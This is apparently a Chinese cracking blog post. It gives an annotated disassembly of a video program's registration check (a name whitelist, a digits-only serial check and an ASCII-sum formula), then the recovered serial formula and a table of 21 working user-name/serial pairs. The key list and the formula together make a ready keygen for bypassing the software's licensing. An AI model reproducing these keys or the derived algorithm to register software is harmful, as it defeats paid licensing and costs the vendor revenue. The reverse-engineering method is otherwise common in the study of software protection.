004B03FC   .  64:FF30       push    dword ptr fs:[eax]
004B03FF   .  64:8920       mov     dword ptr fs:[eax], esp
004B0402   .  C605 9C7D4B00>mov     byte ptr [4B7D9C], 1             ;  全局变量
004B0409   .  FF05 987D4B00 inc     dword ptr [4B7D98]               ;  ———-3次输入限制————-


004B040F   .  833D 987D4B00>cmp     dword ptr [4B7D98], 3
004B0416      7E 07         jle     short 004B041F
004B0418   .  8BC7          mov     eax, edi
004B041A   .  E8 B907FDFF   call    00480BD8                         ;  ————————————————
004B041F   >  8D55 F4       lea     edx, dword ptr [ebp-C]
004B0422   .  8B87 1C030000 mov     eax, dword ptr [edi+31C]
004B0428   .  E8 0342FBFF   call    00464630                         ;  取用户名
004B042D   .  8B45 F4       mov     eax, dword ptr [ebp-C]
004B0430   .  8D55 FC       lea     edx, dword ptr [ebp-4]
004B0433   .  E8 7C82F5FF   call    004086B4
004B0438   .  8D55 F0       lea     edx, dword ptr [ebp-10]
004B043B   .  8B45 FC       mov     eax, dword ptr [ebp-4]
004B043E   .  E8 A582F5FF   call    004086E8                         ;  strcpy复制用户名
004B0443   .  8B55 F0       mov     edx, dword ptr [ebp-10]
004B0446   .  8D45 FC       lea     eax, dword ptr [ebp-4]
004B0449   .  E8 763EF5FF   call    004042C4
004B044E   .  BB 15000000   mov     ebx, 15                          ;  —————–比较用户名——————–
004B0453   .  BE CC5A4B00   mov     esi, 004B5ACC
004B0458   >  8B45 FC       mov     eax, dword ptr [ebp-4]           ;  用户名
004B045B   .  8B16          mov     edx, dword ptr [esi]             ;  真正的用户名
004B045D   .  E8 D641F5FF   call    00404638                         ;  比较
004B0462   .  75 09         jnz     short 004B046D
004B0464   .  C605 9C7D4B00>mov     byte ptr [4B7D9C], 0             ;  相等则全局变量置0
004B046B   .  EB 06         jmp     short 004B0473
004B046D   >  83C6 04       add     esi, 4
004B0470   .  4B            dec     ebx
004B0471   .^ 75 E5         jnz     short 004B0458
004B0473   >  803D 9C7D4B00>cmp     byte ptr [4B7D9C], 0
004B047A   .  74 1A         je      short 004B0496
004B047C   .  6A 00         push    0
004B047E   .  66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0485   .  B2 02         mov     dl, 2
004B0487   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!
004B048C   .  E8 7B55F8FF   call    00435A0C
004B0491   .  E9 2D010000   jmp     004B05C3                         ;  ————————————————
004B0496   >  8D55 EC       lea     edx, dword ptr [ebp-14]
004B0499   .  8B87 20030000 mov     eax, dword ptr [edi+320]
004B049F   .  E8 8C41FBFF   call    00464630                         ;  取序列号
004B04A4   .  8B45 EC       mov     eax, dword ptr [ebp-14]
004B04A7   .  8D55 F8       lea     edx, dword ptr [ebp-8]
004B04AA   .  E8 0582F5FF   call    004086B4
004B04AF   .  8D55 E8       lea     edx, dword ptr [ebp-18]
004B04B2   .  8B45 F8       mov     eax, dword ptr [ebp-8]
004B04B5   .  E8 2E82F5FF   call    004086E8                         ;  strcpy复制序列号
004B04BA   .  8B55 E8       mov     edx, dword ptr [ebp-18]
004B04BD   .  8D45 F8       lea     eax, dword ptr [ebp-8]
004B04C0   .  E8 FF3DF5FF   call    004042C4
004B04C5   .  837D FC 00    cmp     dword ptr [ebp-4], 0             ;  用户名是否为空
004B04C9   .  0F84 F4000000 je      004B05C3
004B04CF   .  837D F8 00    cmp     dword ptr [ebp-8], 0             ;  序列号是否为空
004B04D3   .  0F84 EA000000 je      004B05C3
004B04D9   .  8B45 F8       mov     eax, dword ptr [ebp-8]
004B04DC   .  E8 0B40F5FF   call    004044EC                         ;  取序列号长度
004B04E1   .  85C0          test    eax, eax
004B04E3   .  7E 35         jle     short 004B051A
004B04E5   .  BA 01000000   mov     edx, 1                           ;  ———–判断序列号每一位是不是数字——————-
004B04EA   >  8B4D F8       mov     ecx, dword ptr [ebp-8]
004B04ED   .  0FB64C11 FF   movzx   ecx, byte ptr [ecx+edx-1]        ;  序列号数组
004B04F2   .  83F9 30       cmp     ecx, 30
004B04F5   .  7C 05         jl      short 004B04FC
004B04F7   .  83F9 39       cmp     ecx, 39
004B04FA   .  7E 1A         jle     short 004B0516
004B04FC   >  6A 00         push    0
004B04FE   .  66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0505   .  B2 02         mov     dl, 2
004B0507   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!
004B050C   .  E8 FB54F8FF   call    00435A0C
004B0511   .  E9 AD000000   jmp     004B05C3
004B0516   >  42            inc     edx
004B0517   .  48            dec     eax
004B0518   .^ 75 D0         jnz     short 004B04EA                   ;  ———————————————-
004B051A   >  33F6          xor     esi, esi
004B051C   .  8B45 FC       mov     eax, dword ptr [ebp-4]
004B051F   .  E8 C83FF5FF   call    004044EC                         ;  取用户名长度
004B0524   .  85C0          test    eax, eax
004B0526   .  7E 13         jle     short 004B053B
004B0528   .  BB 01000000   mov     ebx, 1                           ;  ———-用户名ASC求和——————-
004B052D   >  8B55 FC       mov     edx, dword ptr [ebp-4]
004B0530   .  0FB6541A FF   movzx   edx, byte ptr [edx+ebx-1]
004B0535   .  03F2          add     esi, edx
004B0537   .  43            inc     ebx
004B0538   .  48            dec     eax
004B0539   .^ 75 F2         jnz     short 004B052D                   ;  ———————————————
004B053B   >  69C6 90B70B00 imul    eax, esi, 0BB790                 ;  (用户名ASC和*0x0bb790+0×314)/2
004B0541   .  05 14030000   add     eax, 314
004B0546   .  D1F8          sar     eax, 1
004B0548   .  79 03         jns     short 004B054D
004B054A   .  83D0 00       adc     eax, 0
004B054D   >  8BF0          mov     esi, eax
004B054F   .  8B45 F8       mov     eax, dword ptr [ebp-8]
004B0552   .  E8 B183F5FF   call    00408908                         ;  序列号转换成十进制数
004B0557   .  3BF0          cmp     esi, eax
004B0559   .  75 53         jnz     short 004B05AE
004B055B   .  6A 00         push    0
004B055D   .  66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0564   .  B2 02         mov     dl, 2
004B0566   .  B8 48064B00   mov     eax, 004B0648                    ;  congratuation! you have successfully registered!
004B056B   .  E8 9C54F8FF   call    00435A0C
004B0570   .  A1 9C5E4B00   mov     eax, dword ptr [4B5E9C]
004B0575   .  C600 01       mov     byte ptr [eax], 1
004B0578   .  A1 945F4B00   mov     eax, dword ptr [4B5F94]
004B057D   .  8B00          mov     eax, dword ptr [eax]
004B057F   .  33C9          xor     ecx, ecx
004B0581   .  BA 04000000   mov     edx, 4
004B0586   .  8B18          mov     ebx, dword ptr [eax]
004B0588   .  FF53 14       call    dword ptr [ebx+14]
004B058B   .  8B15 9C5E4B00 mov     edx, dword ptr [4B5E9C]          ;  EZ_VIDEO.004B7DAC
004B0591   .  A1 945F4B00   mov     eax, dword ptr [4B5F94]
004B0596   .  8B00          mov     eax, dword ptr [eax]
004B0598   .  B9 01000000   mov     ecx, 1
004B059D   .  E8 A2E3F6FF   call    0041E944
004B05A2   .  A1 947D4B00   mov     eax, dword ptr [4B7D94]
004B05A7   .  E8 2C06FDFF   call    00480BD8
004B05AC   .  EB 15         jmp     short 004B05C3
004B05AE   >  6A 00         push    0
004B05B0   .  66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B05B7   .  B2 02         mov     dl, 2
004B05B9   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!
004B05BE   .  E8 4954F8FF   call    00435A0C
004B05C3   >  33C0          xor     eax, eax
004B05C5   .  5A            pop     edx
004B05C6   .  59            pop     ecx
004B05C7   .  59            pop     ecx
004B05C8   .  64:8910       mov     dword ptr fs:[eax], edx
004B05CB   .  68 05064B00   push    004B0605
004B05D0   >  8D45 E8       lea     eax, dword ptr [ebp-18]
004B05D3   .  E8 543CF5FF   call    0040422C
004B05D8   .  8D45 EC       lea     eax, dword ptr [ebp-14]
004B05DB   .  E8 4C3CF5FF   call    0040422C
004B05E0   .  8D45 F0       lea     eax, dword ptr [ebp-10]
004B05E3   .  E8 443CF5FF   call    0040422C
004B05E8   .  8D45 F4       lea     eax, dword ptr [ebp-C]
004B05EB   .  E8 3C3CF5FF   call    0040422C
004B05F0   .  8D45 F8       lea     eax, dword ptr [ebp-8]
004B05F3   .  BA 02000000   mov     edx, 2
004B05F8   .  E8 533CF5FF   call    00404250
004B05FD   .  C3            retn
004B05FE   .^ E9 8935F5FF   jmp     00403B8C
004B0603   .^ EB CB         jmp     short 004B05D0
004B0605   .  5F            pop     edi
004B0606   .  5E            pop     esi
004B0607   .  5B            pop     ebx
004B0608   .  8BE5          mov     esp, ebp
004B060A   .  5D            pop     ebp
004B060B   .  C3            retn

 用户名用数组存放,是给定的,只要满足:

序列号=(用户名ASC和*0x0bb790+0×314)/2

就可以注册成功

用户名和注册码如下:

用户名:                                               序列号:
VqhfwqY-VI3fg486                     517556906
Perf7gJ-T8ydwt86                       529843114
tawer98-SYrw3w76                    533298610
TqervDR-S1e2feP6                       516405074
OafegD6-LVrs5eU1                      509878026
Taqevq9-S7el9qT1                       529075226
rdgtrp6-ZV1m8ynN                     559406802
BqredCw-VQvWVdB1                  536754106
BsdewfA-VKmVBaB1                   517172962
BMertyD-VAwkEBKB                   522548178
Ouijnsr-AKzO0u47                      539057770
Oftyuf8-KO109vf1                        504886754
iknfEML-VKdiMPO1                     515253242
Ipdwwa6-VEJ6yvU1                   527923394
IgvcdJT-BBYsrYX1                     526771562
DawqaUl-tqeLwlV1                      575916394
SsegbT6-DVlrmf99                      531378890
erswqwS-AKfnlp41                      569005402
SweNrvQ-TTdtgjN1                     560174690
gaeuprE-MIrgbnN3                    561326522
ZsfdeS6-M9ofvpN3                     535986218

]]> http://www.lingdux.com/2010/169.html/feed 0